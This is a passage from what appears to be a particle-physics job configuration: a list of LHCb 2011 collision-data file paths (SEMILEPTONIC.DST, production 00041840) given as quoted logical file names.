'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060758_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008732_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020759_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013179_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027891_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063926_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018689_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009127_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036992_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039982_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061816_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039547_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035748_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008946_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016435_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056844_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035190_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043975_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017325_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063491_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022808_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001894_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002588_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013336_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010332_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045800_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023018_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046910_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044656_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059776_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014210_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033337_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011572_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034479_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058690_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002672_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033731_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034634_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024720_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012446_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049618_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001071_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068055_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053114_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048672_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063368_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038044_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059883_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003510_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068956_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048994_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016558_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000887_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003044_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017281_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052332_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060834_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028309_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017383_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053144_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000056_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062658_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066166_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034306_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000299_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043049_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029787_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037469_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052939_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057713_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020815_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060041_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064180_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020202_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061391_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026466_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031385_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058255_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021794_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010632_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041841_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048432_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017432_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028757_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062050_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053315_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034117_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039890_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058051_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056473_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019386_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052334_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004301_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008970_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042797_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027932_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025719_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041178_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060484_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005676_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062555_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051871_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066784_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024422_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066284_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016105_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005954_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018013_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017696_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015311_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060115_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001981_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030948_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044455_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058137_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021930_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052298_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027440_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019245_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032052_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062163_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026231_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061635_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009270_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048263_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056731_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052360_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005012_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064648_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056603_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000445_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028404_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020560_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011519_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017738_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010213_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051639_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068642_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062376_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036043_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029965_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065612_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022769_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062736_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010142_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067917_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010697_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060598_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065227_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069259_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046150_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032338_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067932_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023743_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046124_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032892_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021002_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010696_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008458_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038317_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015310_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069406_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058837_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000489_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068914_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001256_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008415_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050526_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040227_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011767_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018674_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023995_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068671_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019994_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011601_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030572_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066775_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046487_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023636_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028425_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039623_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010318_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015666_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017623_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008647_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059591_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015406_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018284_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062426_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001576_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053806_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015947_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036628_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045347_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028892_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062772_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016405_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046863_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030329_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007807_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060222_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044271_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060102_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034112_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027161_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051849_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012362_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019568_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063632_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026065_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018242_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061123_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017573_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011751_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030817_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021838_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067673_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023994_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052627_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009230_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037666_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014155_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067270_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067578_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051784_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042423_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064884_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010723_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046326_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069391_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030061_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036029_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057925_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044182_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061155_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067897_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057749_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044812_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057328_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032893_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034414_1.semileptonic.dst',
